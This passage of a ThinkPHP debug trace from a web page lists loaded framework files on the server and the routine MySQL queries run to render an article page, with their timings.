  122. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TableFieldInfo.php ( 2.63 KB )
  123. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/Transaction.php ( 2.77 KB )
  124. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/driver/File.php ( 5.96 KB )
  125. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/LogHandlerInterface.php ( 0.86 KB )
  126. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/log/Channel.php ( 3.89 KB )
  127. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/event/LogRecord.php ( 1.02 KB )
  128. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/Collection.php ( 16.47 KB )
  129. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/View.php ( 1.70 KB )
  130. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/View.php ( 4.39 KB )
  131. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Response.php ( 8.81 KB )
  132. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/response/View.php ( 3.29 KB )
  133. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cookie.php ( 6.06 KB )
  134. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-view/src/Think.php ( 8.38 KB )
  135. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/TemplateHandlerInterface.php ( 1.60 KB )
  136. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/Template.php ( 46.61 KB )
  137. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/driver/File.php ( 2.41 KB )
  138. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-template/src/template/contract/DriverInterface.php ( 0.86 KB )
  139. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/runtime/temp/067d451b9a0c665040f3f1bdd3293d68.php ( 11.98 KB )
  140. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Html.php ( 4.42 KB )
  1. CONNECT:[ UseTime:0.000474s ] mysql:host=127.0.0.1;port=3306;dbname=f_mffb;charset=utf8mb4
  2. SHOW FULL COLUMNS FROM `fenlei` [ RunTime:0.000730s ]
  3. SELECT * FROM `fenlei` WHERE `fid` = 0 [ RunTime:0.000305s ]
  4. SELECT * FROM `fenlei` WHERE `fid` = 63 [ RunTime:0.009621s ]
  5. SHOW FULL COLUMNS FROM `set` [ RunTime:0.000506s ]
  6. SELECT * FROM `set` [ RunTime:0.000267s ]
  7. SHOW FULL COLUMNS FROM `article` [ RunTime:0.000579s ]
  8. SELECT * FROM `article` WHERE `id` = 477517 LIMIT 1 [ RunTime:0.000472s ]
  9. UPDATE `article` SET `lasttime` = 1772240563 WHERE `id` = 477517 [ RunTime:0.012213s ]
  10. SELECT * FROM `fenlei` WHERE `id` = 66 LIMIT 1 [ RunTime:0.001911s ]
  11. SELECT * FROM `article` WHERE `id` < 477517 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000532s ]
  12. SELECT * FROM `article` WHERE `id` > 477517 ORDER BY `id` ASC LIMIT 1 [ RunTime:0.000381s ]
  13. SELECT * FROM `article` WHERE `id` < 477517 ORDER BY `id` DESC LIMIT 10 [ RunTime:0.002660s ]
  14. SELECT * FROM `article` WHERE `id` < 477517 ORDER BY `id` DESC LIMIT 10,10 [ RunTime:0.009404s ]
  15. SELECT * FROM `article` WHERE `id` < 477517 ORDER BY `id` DESC LIMIT 20,10 [ RunTime:0.002756s ]
0.112346s